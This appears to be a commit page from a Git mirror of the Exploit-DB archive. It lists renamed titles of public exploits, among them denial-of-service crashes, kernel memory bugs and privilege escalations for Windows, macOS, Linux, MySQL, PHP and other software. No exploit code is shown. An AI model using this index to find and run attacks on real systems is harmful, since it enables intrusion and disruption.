bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-11-17

Browse source 
3 new exploits

Redhat 6.1 / 6.2 - TTY Flood Users Exploit
RedHat 6.1 / 6.2 - TTY Flood Users Exploit

Microsoft Windows - Kernel ANI File Parsing Crash
Microsoft Windows Kernel - '.ANI' File Parsing Crash

PunBB 2.0.10 - (Register Multiple Users) Denial Of Service
PunBB 2.0.10 - (Register Multiple Users) Denial of Service

Apple Mac OSX 10.4.x - Kernel shared_region_map_file_np() Memory Corruption
Apple Mac OSX 10.4.x Kernel - shared_region_map_file_np() Memory Corruption

MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial Of Service
MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial of Service

MailEnable Professional/Enterprise 2.37 - Denial Of Service
MailEnable Professional/Enterprise 2.37 - Denial of Service

Apple Mac OSX 10.4.x - Kernel i386_set_ldt() Integer Overflow (PoC)
Apple Mac OSX 10.4.x Kernel -  i386_set_ldt() Integer Overflow (PoC)

Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial Of Service
Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial of Service

MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Command Denial Of Service
MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Command Denial of Service
snircd 1.3.4 - (send_user_mode) Denial of Service
MPlayer - sdpplin_parse() Array Indexing Buffer Overflow (PoC)
Snircd 1.3.4 - 'send_user_mode' Denial of Service
MPlayer 1.0 rc2 - 'sdpplin_parse()' Array Indexing Buffer Overflow (PoC)

LogMeIn Remote Access Utility - ActiveX Memory Corruption (Denial Of Service)
LogMeIn Remote Access Utility - ActiveX Memory Corruption (Denial of Service)

ZoIPer 2.22 - Call-Info Remote Denial Of Service
ZoIPer 2.22 - Call-Info Remote Denial of Service

Dualis 20.4 - '.bin' Local Denial Of Service
Dualis 20.4 - '.bin' Local Denial of Service

Dolphin 2.0 - '.elf' Local Denial Of Service
Dolphin 2.0 - '.elf' Local Denial of Service

Home FTP Server r1.10.3 (build 144) - Denial of Service
Home FTP Server 1.10.3 (build 144) - Denial of Service

Red Hat Linux - stickiness of /tmp Exploit
RedHat Linux - Stickiness of /tmp Exploit

Apple Mac OSX < 10.6.7 - Kernel Panic Exploit
Apple Mac OSX < 10.6.7 - Kernel Panic

Red Hat TUX 2.1.0-2 - HTTP Server Oversized Host Denial of Service
RedHat TUX 2.1.0-2 - HTTP Server Oversized Host Denial of Service

Titan FTP Server 3.0 - 'LIST' Command Denial Of Service
Titan FTP Server 3.0 - 'LIST' Command Denial of Service

Mozilla0.x / Netscape 3/4 / Firefox 1.0 - JavaScript IFRAME Rendering Denial Of Service
Mozilla0.x / Netscape 3/4 / Firefox 1.0 - JavaScript IFRAME Rendering Denial of Service

I Hear U 0.5.6 - Multiple Remote Denial Of Service Vulnerabilities
I Hear U 0.5.6 - Multiple Remote Denial of Service Vulnerabilities

Microsoft Windows Explorer - '.png' Image Local Denial Of Service
Microsoft Windows Explorer - '.png' Image Local Denial of Service

Mozilla FireFox 2.0.8 - Sidebar Bookmark Persistent Denial Of Service
Mozilla FireFox 2.0.8 - Sidebar Bookmark Persistent Denial of Service

MySQL 5.1.23 - Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service
MySQL 5.1.23 - Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial of Service

PHP 5.2.5 - Multiple GetText functions Denial Of Service Vulnerabilities
PHP 5.2.5 - Multiple GetText functions Denial of Service Vulnerabilities

LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial Of Service
LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial of Service

Pragma Systems FortressSSH 5.0 - 'msvcrt.dll' Exception Handling Remote Denial Of Service
Pragma Systems FortressSSH 5.0 - 'msvcrt.dll' Exception Handling Remote Denial of Service

Sami FTP Server 2.0.x - Multiple Commands Remote Denial Of Service Vulnerabilities
Sami FTP Server 2.0.x - Multiple Commands Remote Denial of Service Vulnerabilities

SurgeFTP 2.3a2 - 'Content-Length' Parameter Null Pointer Denial Of Service
SurgeFTP 2.3a2 - 'Content-Length' Parameter Null Pointer Denial of Service

RemotelyAnywhere 8.0.668 - 'Accept-Charset' Parameter Null Pointer Denial Of Service
RemotelyAnywhere 8.0.668 - 'Accept-Charset' Parameter Null Pointer Denial of Service

MySQL 5.1.13 - INFORMATION_SCHEMA Remote Denial Of Service
snircd 1.3.4 And ircu 2.10.12.12 - 'set_user_mode' Remote Denial of Service
MySQL 5.1.13 - INFORMATION_SCHEMA Remote Denial of Service
SLMail Pro 6.3.1.0 - Multiple Remote Denial Of Service / Memory Corruption Vulnerabilities
Microsoft Windows XP/Vista/2000/2003/2008 - Kernel Usermode Callback Privilege Escalation (1)
SLMail Pro 6.3.1.0 - Multiple Remote Denial of Service / Memory Corruption Vulnerabilities
Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (1)

SmarterTools SmarterMail 5.0 - HTTP Request Handling Denial Of Service
SmarterTools SmarterMail 5.0 - HTTP Request Handling Denial of Service

Apple iCal 3.0.1 - 'ATTACH' Parameter Denial Of Service
Apple iCal 3.0.1 - 'ATTACH' Parameter Denial of Service

WinWebMail 3.7.3 - IMAP Login Data Handling Denial Of Service
WinWebMail 3.7.3 - IMAP Login Data Handling Denial of Service

Computer Associates ARCserve Backup Discovery Service Remote - Denial Of Service
Computer Associates ARCserve Backup Discovery Service Remote - Denial of Service

Microsoft Excel 2007 - JavaScript Code Remote Denial Of Service
Microsoft Excel 2007 - JavaScript Code Remote Denial of Service

GNOME Rhythmbox 0.11.5 - Malformed Playlist File Denial Of Service
GNOME Rhythmbox 0.11.5 - Malformed Playlist File Denial of Service

GNOME Evolution 2.22.2 - 'html_engine_get_view_width()' Denial Of Service
GNOME Evolution 2.22.2 - 'html_engine_get_view_width()' Denial of Service

SWAT 4 - Multiple Denial Of Service Vulnerabilities
SWAT 4 - Multiple Denial of Service Vulnerabilities

Unreal Tournament 3 - Denial Of Service / Memory Corruption
Unreal Tournament 3 - Denial of Service / Memory Corruption

Combat Evolved 1.0.7.0615 - Multiple Denial Of Service Vulnerabilities
Combat Evolved 1.0.7.0615 - Multiple Denial of Service Vulnerabilities

Noticeware Email Server 4.6 - NG LOGIN Messages Denial Of Service
Noticeware Email Server 4.6 - NG LOGIN Messages Denial of Service

Ruby 1.9 - REXML Remote Denial Of Service
Ruby 1.9 - REXML Remote Denial of Service

Red Hat 8/9 - Directory Server Crafted Search Pattern Denial of Service
RedHat 8/9 - Directory Server Crafted Search Pattern Denial of Service

MySQL 6.0.4 - Empty Binary String Literal Remote Denial Of Service
MySQL 6.0.4 - Empty Binary String Literal Remote Denial of Service

Mass Downloader - Malformed Executable Denial Of Service
Mass Downloader - Malformed Executable Denial of Service
Microsoft Windows 2003/Vista - 'UnhookWindowsHookEx' Local Denial Of Service
Zope 2.11.2 - PythonScript Multiple Remote Denial Of Service Vulnerabilities
Microsoft Windows 2003/Vista - 'UnhookWindowsHookEx' Local Denial of Service
Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities

GeSHi 1.0.x - XML Parsing Remote Denial Of Service
GeSHi 1.0.x - XML Parsing Remote Denial of Service

Symbian S60 - Malformed SMS/Mms Remote Denial Of Service
Symbian S60 - Malformed SMS/Mms Remote Denial of Service
InfraRecorder 0.53 - Memory Corruption (Denial Of Service)
IBM Websphere DataPower XML Security Gateway 3.6.1 XS40 - Remote Denial Of Service
InfraRecorder 0.53 - Memory Corruption (Denial of Service)
IBM Websphere DataPower XML Security Gateway 3.6.1 XS40 - Remote Denial of Service

QNX RTOS 6.4 - Malformed ELF Binary File Local Denial Of Service
QNX RTOS 6.4 - Malformed ELF Binary File Local Denial of Service
Apple Safari For Windows 3.2.1 - Malformed URI Remote Denial Of Service
PHP 5.2.5 - 'mbstring.func_overload' WebServer Denial Of Service
Apple Safari For Windows 3.2.1 - Malformed URI Remote Denial of Service
PHP 5.2.5 - 'mbstring.func_overload' WebServer Denial of Service

Apple Safari 4 - Malformed 'feeds:' URI Null Pointer Dereference Remote Denial Of Service
Apple Safari 4 - Malformed 'feeds:' URI Null Pointer Dereference Remote Denial of Service

MySQL 6.0.9 - XPath Expression Remote Denial Of Service
MySQL 6.0.9 - XPath Expression Remote Denial of Service
MPlayer - Malformed AAC File Handling Denial of Service
MPlayer - Malformed OGM File Handling Denial of Service
MPlayer - '.AAC' File Handling Denial of Service
MPlayer - '.OGM' File Handling Denial of Service

Mani's Admin Plugin - Remote Denial Of Service
Mani's Admin Plugin - Remote Denial of Service
cFos Personal Net 3.09 - Remote Heap Memory Corruption (Denial Of Service)
CUPS 1.3.9 - 'cups/ipp.c' Null Pointer Dereference Denial Of Service
cFos Personal Net 3.09 - Remote Heap Memory Corruption (Denial of Service)
CUPS 1.3.9 - 'cups/ipp.c' Null Pointer Dereference Denial of Service

Git 1.6.3 - Parameter Processing Remote Denial Of Service
Git 1.6.3 - Parameter Processing Remote Denial of Service

GUPnP 0.12.7 - Message Handling Denial Of Service
GUPnP 0.12.7 - Message Handling Denial of Service

ntop 3.3.10 - HTTP Basic Authentication Null Pointer Dereference Denial Of Service
ntop 3.3.10 - HTTP Basic Authentication Null Pointer Dereference Denial of Service

FileCOPA FTP Server 5.01 - 'NOOP' Command Denial Of Service
FileCOPA FTP Server 5.01 - 'NOOP' Command Denial of Service

Snort 2.8.5 - Multiple Denial Of Service Vulnerabilities
Snort 2.8.5 - Multiple Denial of Service Vulnerabilities

lighttpd 1.4/1.5 - Slow Request Handling Remote Denial Of Service
lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Service

Skybox Security 6.3.x < 6.4.x - Multiple Denial Of Service Issue
Skybox Security 6.3.x < 6.4.x - Multiple Denial of Service Issue

Hybserv2 - ':help' Command Denial Of Service
Hybserv2 - ':help' Command Denial of Service
Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial Of Service
Apple Safari 4.0.4 - Remote Denial Of Service
Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial of Service
Apple Safari 4.0.4 - Remote Denial of Service

FreeBSD 8.0 / OpenBSD 4.x - 'ftpd' Null Pointer Dereference Denial Of Service
FreeBSD 8.0 / OpenBSD 4.x - 'ftpd' Null Pointer Dereference Denial of Service

PostgreSQL 8.4.1 - JOIN Hashtable Size Integer Overflow Denial Of Service
PostgreSQL 8.4.1 - JOIN Hashtable Size Integer Overflow Denial of Service

Remote Help HTTP 0.0.7 - GET Request Format String Denial Of Service
Remote Help HTTP 0.0.7 - GET Request Format String Denial of Service

netKar PRO 1.1 - '.nkuser' File Creation Null Pointer Denial Of Service
netKar PRO 1.1 - '.nkuser' File Creation Null Pointer Denial of Service
Geo++ GNCASTER 1.4.0.7 - HTTP GET Request Denial Of Service
Geo++ GNCASTER 1.4.0.7 NMEA-data - Denial Of Service
Xitami 5.0 - '/AUX' Request Remote Denial Of Service
Geo++ GNCASTER 1.4.0.7 - HTTP GET Request Denial of Service
Geo++ GNCASTER 1.4.0.7 NMEA-data - Denial of Service
Xitami 5.0 - '/AUX' Request Remote Denial of Service

Torque Game Engine - Multiple Denial Of Service Vulnerabilities
Torque Game Engine - Multiple Denial of Service Vulnerabilities

EA Battlefield 2 1.41 / Battlefield 2142 1.50 - Multiple Denial Of Service Vulnerabilities
EA Battlefield 2 1.41 / Battlefield 2142 1.50 - Multiple Denial of Service Vulnerabilities

Unreal Engine - 'ReceivedRawBunch()' Denial Of Service
Unreal Engine - 'ReceivedRawBunch()' Denial of Service

Chrome Engine 4 - Denial Of Service
Chrome Engine 4 - Denial of Service

Sagem Fast 3304-V1 - Denial Of Service
Sagem Fast 3304-V1 - Denial of Service

Sumatra PDF 1.1 - Denial Of Service
Sumatra PDF 1.1 - Denial of Service
Freeciv 2.2.1 - Multiple Remote Denial Of Service Vulnerabilities
Multiple Tripwire Interactive Games - 'STEAMCLIENTBLOB' Multiple Denial Of Service Vulnerabilities
Freeciv 2.2.1 - Multiple Remote Denial of Service Vulnerabilities
Multiple Tripwire Interactive Games - 'STEAMCLIENTBLOB' Multiple Denial of Service Vulnerabilities

Microsoft DirectX 8/9 DirectPlay - Multiple Denial Of Service Vulnerabilities
Microsoft DirectX 8/9 DirectPlay - Multiple Denial of Service Vulnerabilities

PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial Of Service
PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial of Service

Sniper Elite 1.0 - Null Pointer Dereference Denial Of Service
Sniper Elite 1.0 - Null Pointer Dereference Denial of Service
MySQL 5.1.48 - 'Temporary InnoDB' Tables Denial Of Service
MySQL 5.1.48 - 'EXPLAIN' Denial Of Service
OraclMySQL 5.1.48 - 'LOAD DATA INFILE' Denial Of Service
MySQL 5.1.48 - 'Temporary InnoDB' Tables Denial of Service
MySQL 5.1.48 - 'EXPLAIN' Denial of Service
OraclMySQL 5.1.48 - 'LOAD DATA INFILE' Denial of Service
Oracle MySQL 5.1.48 - 'HANDLER' Interface Denial Of Service
Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial Of Service
Oracle MySQL < 5.1.49 - 'DDL' Statements Denial Of Service
Oracle MySQL 5.1.48 - 'HANDLER' Interface Denial of Service
Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial of Service
Oracle MySQL < 5.1.49 - 'DDL' Statements Denial of Service

GNU glibc - 'regcomp()' Stack Exhaustion Denial Of Service
GNU glibc - 'regcomp()' Stack Exhaustion Denial of Service

Mongoose 2.11 - 'Content-Length' HTTP Header Remote Denial Of Service
Mongoose 2.11 - 'Content-Length' HTTP Header Remote Denial of Service

Microsoft Internet Explorer 11 - Denial Of Service
Microsoft Internet Explorer 11 - Denial of Service

Golden FTP Server 4.70 - Malformed Message Denial Of Service
Golden FTP Server 4.70 - Malformed Message Denial of Service
TP-Link TL-WR740N - Denial Of Service
PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference Denial Of Service
TP-Link TL-WR740N - Denial of Service
PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference Denial of Service

Battlefield 2/2142 - Malformed Packet Null Pointer Dereference Remote Denial Of Service
Battlefield 2/2142 - Malformed Packet Null Pointer Dereference Remote Denial of Service
Wireshark 1.4.3 - NTLMSSP Null Pointer Dereference Denial Of Service
Air Contacts Lite - HTTP Packet Denial Of Service
Wireshark 1.4.3 - NTLMSSP Null Pointer Dereference Denial of Service
Air Contacts Lite - HTTP Packet Denial of Service

TOTVS ERP Microsiga Protheus 8/10 - Memory Corruption (Denial Of Service)
TOTVS ERP Microsiga Protheus 8/10 - Memory Corruption (Denial of Service)

Perl 5.10 - Multiple Null Pointer Dereference Denial Of Service Vulnerabilities
Perl 5.10 - Multiple Null Pointer Dereference Denial of Service Vulnerabilities

Novell eDirectory 8.8 and Netware LDAP-SSL Daemon - Denial Of Service
Novell eDirectory 8.8 and Netware LDAP-SSL Daemon - Denial of Service

Wireshark 1.4.5 - 'bytes_repr_len()' Null Pointer Dereference Denial Of Service
Wireshark 1.4.5 - 'bytes_repr_len()' Null Pointer Dereference Denial of Service

RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - Null Pointer Dereference Denial Of Service
RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - Null Pointer Dereference Denial of Service

PHP < 5.3.7 - Multiple Null Pointer Dereference Denial Of Service Vulnerabilities
PHP < 5.3.7 - Multiple Null Pointer Dereference Denial of Service Vulnerabilities
Polipo 1.0.4.1 - POST/PUT Requests HTTP Header Processing Denial Of Service
Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service
Polipo 1.0.4.1 - POST/PUT Requests HTTP Header Processing Denial of Service
Microsoft Host Integration Server 2004-2010 - Remote Denial of Service

Multiple Vendors - libc 'regcomp()' Stack Exhaustion Denial Of Service
Multiple Vendors - libc 'regcomp()' Stack Exhaustion Denial of Service

Titan FTP Server 8.40 - 'APPE' Command Remote Denial Of Service
Titan FTP Server 8.40 - 'APPE' Command Remote Denial of Service
Apache APR - Hash Collision Denial Of Service
PHP PDORow Object - Remote Denial Of Service
Apache APR - Hash Collision Denial of Service
PHP PDORow Object - Remote Denial of Service

PHP 5.3.8 - Remote Denial Of Service
PHP 5.3.8 - Remote Denial of Service

Mercury MR804 Router - Multiple HTTP Header Fields Denial Of Service Vulnerabilities
Mercury MR804 Router - Multiple HTTP Header Fields Denial of Service Vulnerabilities

Sony Bravia KDL-32CX525 - 'hping' Command Remote Denial Of Service
Sony Bravia KDL-32CX525 - 'hping' Command Remote Denial of Service

Universal Reader 1.16.740.0 - 'uread.exe' Denial Of Service
Universal Reader 1.16.740.0 - 'uread.exe' Denial of Service

Apache Sling - Denial Of Service
Apache Sling - Denial of Service

VideoLAN VLC Media Player 2.0.2 - '.3gp' File Divide-by-Zero Denial Of Service
VideoLAN VLC Media Player 2.0.2 - '.3gp' File Divide-by-Zero Denial of Service
Microsoft Windows - Kernel Bitmap Handling Use-After-Free (MS15-061) (2)
Microsoft Windows - Kernel DeferWindowPos Use-After-Free (MS15-073)
Microsoft Windows - Kernel UserCommitDesktopMemory Use-After-Free (MS15-073)
Microsoft Windows - Kernel Pool Buffer Overflow Drawing Caption Bar (MS15-061)
Microsoft Windows - Kernel HmgAllocateObjectAttr Use-After-Free (MS15-061)
Microsoft Windows - Kernel win32k!vSolidFillRect Buffer Overflow (MS15-061)
Microsoft Windows - Kernel SURFOBJ Null Pointer Dereference (MS15-061)
Microsoft Windows - Kernel Brush Object Use-After-Free (MS15-061)
Microsoft Windows - Kernel WindowStation Use-After-Free (MS15-061)
Microsoft Windows - Kernel Null Pointer Dereference with Window Station and Clipboard (MS15-061)
Microsoft Windows - Kernel Bitmap Handling Use-After-Free (MS15-061) (1)
Microsoft Windows - Kernel FlashWindowEx​ Memory Corruption (MS15-097)
Microsoft Windows - Kernel bGetRealizedBrush Use-After-Free (MS15-097)
Microsoft Windows - Kernel Use-After-Free with Cursor Object (MS15-097)
Microsoft Windows - Kernel Use-After-Free with Printer Device Contexts (MS15-097)
Microsoft Windows - Kernel NtGdiStretchBlt Pool Buffer Overflows (MS15-097)
Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2)
Microsoft Windows Kernel - DeferWindowPos Use-After-Free (MS15-073)
Microsoft Windows Kernel - UserCommitDesktopMemory Use-After-Free (MS15-073)
Microsoft Windows Kernel - Pool Buffer Overflow Drawing Caption Bar (MS15-061)
Microsoft Windows Kernel - HmgAllocateObjectAttr Use-After-Free (MS15-061)
Microsoft Windows Kernel - win32k!vSolidFillRect Buffer Overflow (MS15-061)
Microsoft Windows Kernel - SURFOBJ Null Pointer Dereference (MS15-061)
Microsoft Windows Kernel - Brush Object Use-After-Free (MS15-061)
Microsoft Windows Kernel - WindowStation Use-After-Free (MS15-061)
Microsoft Windows Kernel - Null Pointer Dereference with Window Station and Clipboard (MS15-061)
Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1)
Microsoft Windows Kernel - FlashWindowEx​ Memory Corruption (MS15-097)
Microsoft Windows Kernel - bGetRealizedBrush Use-After-Free (MS15-097)
Microsoft Windows Kernel - Use-After-Free with Cursor Object (MS15-097)
Microsoft Windows Kernel - Use-After-Free with Printer Device Contexts (MS15-097)
Microsoft Windows Kernel - NtGdiStretchBlt Pool Buffer Overflows (MS15-097)

Microsoft Windows - Kernel NtGdiBitBlt Buffer Overflow (MS15-097)
Microsoft Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)

MySQL / MariaDB - Geometry Query Denial Of Service
MySQL / MariaDB - Geometry Query Denial of Service

Apple Mac OSX - Kernel IOAccelMemoryInfoUserClient Use-After-Free
Apple Mac OSX Kernel - IOAccelMemoryInfoUserClient Use-After-Free
Microsoft Windows - Kernel 'win32k.sys' Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)
Microsoft Windows - Kernel 'win32k.sys' Malformed OS/2 Table TTF Font Processing Pool-Based Buffer Overflow (MS15-115)
Microsoft Windows Kernel - 'win32k.sys' Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)
Microsoft Windows Kernel - 'win32k.sys' Malformed OS/2 Table TTF Font Processing Pool-Based Buffer Overflow (MS15-115)

Blue Coat ProxySG 5.x - and Security Gateway OS Denial Of Service
Blue Coat ProxySG 5.x - and Security Gateway OS Denial of Service

Microsoft Windows - Kernel Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)
Microsoft Windows Kernel - Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)

Apple Mac OSX - Kernel no-more-senders Use-After-Free
Apple Mac OSX Kernel - no-more-senders Use-After-Free

Apple Mac OSX - Kernel IOAccelDisplayPipeUserClient2 Use-After-Free
Apple Mac OSX Kernel - IOAccelDisplayPipeUserClient2 Use-After-Free

TFTPD32 / Tftpd64 - Denial Of Service
TFTPD32 / Tftpd64 - Denial of Service
Apple Mac OSX / iOS - Kernel IOHDIXControllUserClient::clientClose Use-After-Free/Double-Free
Apple Mac OSX / iOS - Kernel iokit Registry Iterator Manipulation Double-Free
Apple Mac OSX / iOS Kernel - IOHDIXControllUserClient::clientClose Use-After-Free/Double-Free
Apple Mac OSX / iOS Kernel - iokit Registry Iterator Manipulation Double-Free

Apple Mac OSX - Kernel Hypervisor Driver Use-After-Free
Apple Mac OSX Kernel - Hypervisor Driver Use-After-Free
Microsoft Windows - Kernel 'ATMFD.dll' OTF Font Processing Pool-Based Buffer Overflow (MS16-026)
Microsoft Windows - Kernel 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)
Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Pool-Based Buffer Overflow (MS16-026)
Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)

Apple Mac OSX - Kernel Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort
Apple Mac OSX Kernel - Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort
Apple Mac OSX - Kernel AppleKeyStore Use-After-Free
Apple Mac OSX - Kernel Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in Nvidia Geforce Driver
Apple Mac OSX - Kernel Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver
Apple Mac OSX Kernel - AppleKeyStore Use-After-Free
Apple Mac OSX Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in Nvidia Geforce Driver
Apple Mac OSX Kernel - Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver
Microsoft Windows - Kernel Bitmap Use-After-Free
Microsoft Windows - Kernel NtGdiGetTextExtentExW Out-of-Bounds Memory Read
Microsoft Windows Kernel - Bitmap Use-After-Free
Microsoft Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read

Microsoft Windows - Kernel DrawMenuBarTemp Wild-Write (MS16-039)
Microsoft Windows Kernel - DrawMenuBarTemp Wild-Write (MS16-039)

Microsoft Windows - Kernel 'win32k.sys' TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)
Microsoft Windows Kernel - 'win32k.sys' TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)

Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext
Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext
Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in AppleMuxControl.kext
Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in AppleGraphicsDeviceControl
Apple Mac OSX - Kernel Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource
Apple Mac OSX - Kernel Exploitable NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value
Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in IOAudioEngine
Apple Mac OSX - Kernel OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type
Apple Mac OSX - Kernel Use-After-Free Due to Bad Locking in IOAcceleratorFamily2
Apple Mac OSX / iOS - Kernel UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient
Apple Mac OSX - Kernel Stack Buffer Overflow in GeForce GPU Driver
Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in AppleMuxControl.kext
Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in AppleGraphicsDeviceControl
Apple Mac OSX Kernel - Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource
Apple Mac OSX Kernel - Exploitable NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value
Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in IOAudioEngine
Apple Mac OSX Kernel - OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type
Apple Mac OSX Kernel - Use-After-Free Due to Bad Locking in IOAcceleratorFamily2
Apple Mac OSX / iOS Kernel - UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient
Apple Mac OSX Kernel - GeForce GPU Driver Stack Buffer Overflow

Microsoft Windows - Kernel 'ATMFD.dll' NamedEscape 0x250C Pool Corruption (MS16-074)
Microsoft Windows Kernel - 'ATMFD.dll' NamedEscape 0x250C Pool Corruption (MS16-074)

Apple OS X - Kernel IOBluetoothFamily.kext Use-After-Free
Apple OS X Kernel - IOBluetoothFamily.kext Use-After-Free

Linux Kernel 2.2.x / 2.4.x (Redhat) - 'ptrace/kmod' Privilege Escalation
Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation
XGalaga 2.0.34 - Local game Exploit (Red Hat 9.0)
xtokkaetama 1.0b - Local Game Exploit (Red Hat 9.0)
XGalaga 2.0.34 (RedHat 9.0) - Local Game Exploit
xtokkaetama 1.0b (RedHat 9.0) - Local Game Exploit

hztty 2.0 - Privilege Escalation (Red Hat 9.0)
hztty 2.0 (RedHat 9.0) - Privilege Escalation

Redhat 6.2 /sbin/restore - Exploit
RedHat 6.2 /sbin/restore - Exploit

Redhat 6.2 Restore and Dump - Local Exploit (Perl)
RedHat 6.2 Restore and Dump - Local Exploit (Perl)
Redhat 6.2 /usr/bin/rcp - SUID Privilege Escalation Exploit
dump 0.4b15 (Redhat 6.2) - Exploit
RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation Exploit
dump 0.4b15 (RedHat 6.2) - Exploit

Red Hat 6.2 xsoldier 0.96 - Exploit
xsoldier 0.96 (RedHat 6.2) - Exploit

Redhat 6.1 man - Local Exploit (egid 15)
RedHat 6.1 man - Local Exploit (egid 15)

Microsoft Windows 2000 - Kernel APC Data-Free Local Escalation Exploit (MS05-055)
Microsoft Windows 2000 Kernel - APC Data-Free Local Escalation Exploit (MS05-055)

Microsoft Windows - Kernel Privilege Escalation (MS06-049)
Microsoft Windows Kernel - Privilege Escalation (MS06-049)

Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux (RHEL5) - Kernel Privilege Escalation
Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux (RHEL5) - Privilege Escalation

Linux Kernel 2.x (Redhat) - 'sock_sendpage()' Ring0 Privilege Escalation (1)
Linux Kernel 2.x (RedHat) - 'sock_sendpage()' Ring0 Privilege Escalation (1)

(Linux Kernel 2.6.34-rc3) ReiserFS (Redhat / Ubuntu 9.10) - xattr Privilege Escalation
(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - xattr Privilege Escalation

Linux Kernel 2.6.27 < 2.6.36 (Redhat x86_64) - 'compat' Privilege Escalation
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86_64) - 'compat' Privilege Escalation

Linux Kernel < 2.6.36-rc6 (Redhat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure (PoC)
Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure (PoC)

Linux Kernel 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation (1)
Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation (1)

Immunix OS 6.2/7.0 / Redhat 5.2/6.2/7.0 / S.u.S.E 6.x/7.0/7.1 Man -S - Heap Overflow
Immunix OS 6.2/7.0 / RedHat 5.2/6.2/7.0 / S.u.S.E 6.x/7.0/7.1 Man -S - Heap Overflow

Microsoft Windows - Kernel Intel x64 SYSRET (PoC)
Microsoft Windows Kernel - Intel x64 SYSRET (PoC)

Linux Kernel 3.7.6 (Redhat x86/x64) - 'MSR' Driver Privilege Escalation
Linux Kernel 3.7.6 (RedHat x86/x64) - 'MSR' Driver Privilege Escalation

Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation

Microsoft Windows XP/7 - Kernel 'win32k.sys' Keyboard Layout Privilege Escalation
Microsoft Windows XP/7 Kernel - 'win32k.sys' Keyboard Layout Privilege Escalation

Microsoft Windows - Kernel 'win32k.sys' Privilege Escalation (MS14-058)
Microsoft Windows Kernel - 'win32k.sys' Privilege Escalation (MS14-058)

Apple OS X/iOS - Kernel IOSurface Use-After-Free
Apple OS X/iOS Kernel - IOSurface Use-After-Free

Linux Kernel (Ubuntu / Fedora / Redhat) - 'Overlayfs' Privilege Escalation (Metasploit)
Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)

Ruby 1.8.6 - (Webrick Httpd 1.3.1) Directory Traversal
Ruby 1.8.6/1.9 (WEBick Httpd 1.3.1) - Directory Traversal

